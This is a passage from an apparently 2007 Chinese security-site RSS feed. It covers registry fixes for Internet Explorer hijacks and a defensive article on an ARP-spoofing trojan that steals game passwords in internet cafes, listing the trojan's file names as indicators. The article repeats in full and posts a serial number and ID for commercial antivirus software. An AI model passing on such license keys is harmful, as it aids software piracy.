color=#0000ff><U>注册表</U></FONT>编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt，删除相关的广告条文。 <BR>　　2.右键功能失效。打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions，将其DWORD值"NoBrowserContextMenu"的值改为0。 <BR>　　<B>9.篡改地址栏文字</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>中招者的IE地址栏下方出现一些莫名其妙的文字和图标，地址栏里的下拉框里也有大量的地址，并不是你以前访问过的。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>1.地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName，将其中的内容删去即可。 <BR>　　2.地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。 <BR>　　<B>10.启动时弹出对话框</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>1.系统启动时弹出对话框，通常是一些广告信息，例如欢迎访问某某网站等等。2.开机弹出网页，通常会弹出很多窗口，让你措手不及，恶毒一点的，可以重复弹出窗口直到死机。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>1.弹出对话框。打开注册表编辑器，找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键，然后在右边窗口中找到"LegalNoticeCaption"和"LegalNoticeText"这两个字符串，删除这两个字符串就可以解决在启动时出现提示框的现象了。 <BR>　　2.弹出网页。点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为url、html、htm的网址文件都勾掉。 <BR>　　<B>11.IE窗口定时弹出</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>中招者的机器每隔一段时间就弹出IE窗口，地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾? <BR>　　<FONT color=#0000ff>解决办法:</FONT>点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为hta的都勾掉，重启</P>]]></description>
</item>
<item>
	<title><![CDATA[网吧频繁掉线（ARP）与快速解决方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n544c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:46:07 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P><FONT color=#000000>现在频繁掉线的网吧很多。但为何掉线。许多网管朋友。不是很清楚。网吧掉线的原因很多。现在我给大家讲一下现在很流行的一种木马。&lt;传奇网吧杀手&gt;.基本上东北地区的网吧都被这一木马弄的身心疲惫。但是现在有解决的方法了。 
<P><STRONG>&nbsp;&nbsp;&nbsp; 中病毒特征</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 网吧不定时的掉线。（重启路由后正常），网吧局域网内有个别机器掉线。</P>
<P>&nbsp;&nbsp;&nbsp; <STRONG>木马分析 ：</STRONG> </P>
<P>&nbsp;&nbsp;&nbsp; 传奇杀手木马，是通过ARP欺骗，来或取局域网内发往外网的数据。从而截获局域内一些网游的用户名和密码。</P>
<P><STRONG>&nbsp;&nbsp;&nbsp; 木马解析</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 中木马的机器能虚拟出一个路由器的MAC地址和路由器的IP.当病毒发作时，局域网内就会多出一个路由器的MAC地址。内网在发往外网的数据时，误认为中木马的机器是路由器，从而把这些数据发给了虚拟的路由器。真正路由器的MAC地址被占用。内网的数据发出不去。所以就掉线了。</P>
<P><STRONG>&nbsp;&nbsp;&nbsp; 解决办法</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 首先你下载一个网络执法官，他可以监控局域网内所有机器的MAC地址和局域网内的IP地址。在设置网络执法官时。你必须将网络执法官的IP段设置和你内网的IP段一样。比如说：你的内网IP是192.168.1.1——192.168.1.254你的设置时也要设置192.168.1.1——192.168.1.254.设置完后，你就会看到你的内网中的MAC地址和IP地址。从而可以看出哪台机器中了木马。（在多出的路由器MAC地址和IP地址和内网机器的IP地址，MAC地址一样的说明中了传奇网吧杀手）要是不知道路由器的MAC地址，在路由器的设置界面可以看到。发现木马后。你还要下载瑞星2006最新版的杀病毒软件（3月15日之后的病毒库）。在下载完之后必须在安全模式下查杀（这是瑞星反病毒专家的见意）反复查杀（一般在四次就可以了）注意查完后杀病毒软件不要卸载掉。观查几天（这是我个人的经验。在卸后第三天病毒还会死灰复燃，我想可能是注册表里还有他的隐藏文件。在观查几天后正常就可以卸载掉了。</P>
<P>&nbsp;&nbsp;&nbsp; 注：还原精灵和冰点对网吧传奇杀手木马不起做用。（传奇杀手木马不会感染局域网。不要用硬盘对克，对克跟本不起任何做用。而且还会感染到母盘上。切记！）</P>
<P>&nbsp;&nbsp;&nbsp; 最好主机安装上网络执法官，这样可以时时监控局域网内的动态，发现木马后可以及时做出对策）</P>
<P>&nbsp;&nbsp;&nbsp; 面是传奇网吧杀手木马的文件：</P>
<P>&nbsp;&nbsp;&nbsp; 文件名： 文件路径： 病毒名：</P>
<P>&nbsp;&nbsp;&nbsp; a.exe&gt;&gt;b.exe c：\windows\system32 Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; 235780.dll c：\windows\ Trojan.psw.lmir.aji</P>
<P>&nbsp;&nbsp;&nbsp; kb2357801.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; Q98882.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; kb2357802.log c：\windows\ Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; Q90979.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; Q99418.log c：\windows\ Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; ZT.exe c：\windows\program Files\浩方对战平台 病毒名：Trojan.dL.agent.eqv</P>
<P>&nbsp;&nbsp;&nbsp; a［1］.exe&gt;&gt;b.exec：\documents and sttings\sicent\local settings\Temporary Internet Files\content.IE5\Q5g5g3uj</P>
<P>&nbsp;&nbsp;&nbsp; 病毒名：Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; 有需要瑞星2006 18.18.22（3月15日的版本）和网络执法官2.75注册版的软件请把邮箱留下。</P>
<P>&nbsp;&nbsp;&nbsp; （各位朋友。瑞星杀毒软件文件过大邮箱发送不了。请大家下载瑞星个人18.18.20版杀毒软件我现在给大家提供注册码。希望大家原谅。）</P>
<P>&nbsp;&nbsp;&nbsp; SN=P5V6EH-61FHJK-9G0SS7-C4D200</P>
<P>&nbsp;&nbsp;&nbsp; ID=5B3C5BJ4Y125</P>
<P>&nbsp;&nbsp;&nbsp; （网络执法官可以批量MAC捆绑，到执法官的局域网MAC界面，全选后单击右键会出现批量MAC捆绑。做完捆绑以后，ARP要是在次攻击时他会报警，出现的假MAC是为非法。网络执法官会终止他的一切操作。）这样可以解决ARP在次攻击。现在频繁掉线的网吧很多。但为何掉线。许多网管朋友。不是很清楚。网吧掉线的原因很多。现在我给大家讲一下现在很流行的一种木马。&lt;传奇网吧杀手&gt;.基本上东北地区的网吧都被这一木马弄的身心疲惫。但是现在有解决的方法了。</P>
<P><STRONG>&nbsp;&nbsp;&nbsp; 中病毒特征</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 网吧不定时的掉线。（重启路由后正常），网吧局域网内有个别机器掉线。</P>
<P>&nbsp;&nbsp;&nbsp; <STRONG>木马分析 ：</STRONG> </P>
<P>&nbsp;&nbsp;&nbsp; 传奇杀手木马，是通过ARP欺骗，来或取局域网内发往外网的数据。从而截获局域内一些网游的用户名和密码。</P>
<P><STRONG>&nbsp;&nbsp;&nbsp; 木马解析</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 中木马的机器能虚拟出一个路由器的MAC地址和路由器的IP.当病毒发作时，局域网内就会多出一个路由器的MAC地址。内网在发往外网的数据时，误认为中木马的机器是路由器，从而把这些数据发给了虚拟的路由器。真正路由器的MAC地址被占用。内网的数据发出不去。所以就掉线了。</P>
<P><STRONG>&nbsp;&nbsp;&nbsp; 解决办法</STRONG></P>
<P>&nbsp;&nbsp;&nbsp; 首先你下载一个网络执法官，他可以监控局域网内所有机器的MAC地址和局域网内的IP地址。在设置网络执法官时。你必须将网络执法官的IP段设置和你内网的IP段一样。比如说：你的内网IP是192.168.1.1——192.168.1.254你的设置时也要设置192.168.1.1——192.168.1.254.设置完后，你就会看到你的内网中的MAC地址和IP地址。从而可以看出哪台机器中了木马。（在多出的路由器MAC地址和IP地址和内网机器的IP地址，MAC地址一样的说明中了传奇网吧杀手）要是不知道路由器的MAC地址，在路由器的设置界面可以看到。发现木马后。你还要下载瑞星2006最新版的杀病毒软件（3月15日之后的病毒库）。在下载完之后必须在安全模式下查杀（这是瑞星反病毒专家的见意）反复查杀（一般在四次就可以了）注意查完后杀病毒软件不要卸载掉。观查几天（这是我个人的经验。在卸后第三天病毒还会死灰复燃，我想可能是注册表里还有他的隐藏文件。在观查几天后正常就可以卸载掉了。</P>
<P>&nbsp;&nbsp;&nbsp; 注：还原精灵和冰点对网吧传奇杀手木马不起做用。（传奇杀手木马不会感染局域网。不要用硬盘对克，对克跟本不起任何做用。而且还会感染到母盘上。切记！）</P>
<P>&nbsp;&nbsp;&nbsp; 最好主机安装上网络执法官，这样可以时时监控局域网内的动态，发现木马后可以及时做出对策）</P>
<P>&nbsp;&nbsp;&nbsp; 面是传奇网吧杀手木马的文件：</P>
<P>&nbsp;&nbsp;&nbsp; 文件名： 文件路径： 病毒名：</P>
<P>&nbsp;&nbsp;&nbsp; a.exe&gt;&gt;b.exe c：\windows\system32 Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; 235780.dll c：\windows\ Trojan.psw.lmir.aji</P>
<P>&nbsp;&nbsp;&nbsp; kb2357801.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; Q98882.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; kb2357802.log c：\windows\ Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; Q90979.log c：\windows\ Trojan.psw.lmir.jhe</P>
<P>&nbsp;&nbsp;&nbsp; Q99418.log c：\windows\ Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; ZT.exe c：\windows\program Files\浩方对战平台 病毒名：Trojan.dL.agent.eqv</P>
<P>&nbsp;&nbsp;&nbsp; a［1］.exe&gt;&gt;b.exec：\documents and sttings\sicent\local settings\Temporary Internet Files\content.IE5\Q5g5g3uj</P>
<P>&nbsp;&nbsp;&nbsp; 病毒名：Trojan.psw.lmir.jbg</P>
<P>&nbsp;&nbsp;&nbsp; 有需要瑞星2006 18.18.22（3月15日的版本）和网络执法官2.75注册版的软件请把邮箱留下。</P>
<P>&nbsp;&nbsp;&nbsp; （各位朋友。瑞星杀毒软件文件过大邮箱发送不了。请大家下载瑞星个人18.18.20版杀毒软件我现在给大家提供注册码。希望大家原谅。）</P>
<P>&nbsp;&nbsp;&nbsp; SN=P5V6EH-61FHJK-9G0SS7-C4D200</P>
<P>&nbsp;&nbsp;&nbsp; ID=5B3C5BJ4Y125</P>
<P>&nbsp;&nbsp;&nbsp; （网络执法官可以批量MAC捆绑，到执法官的局域网MAC界面，全选后单击右键会出现批量MAC捆绑。做完捆绑以后，ARP要是在次攻击时他会报警，出现的假MAC是为非法。网络执法官会终止他的一切操作。）这样可以解决ARP在次攻击。</P></FONT>]]></description>
</item>
</channel>
</rss>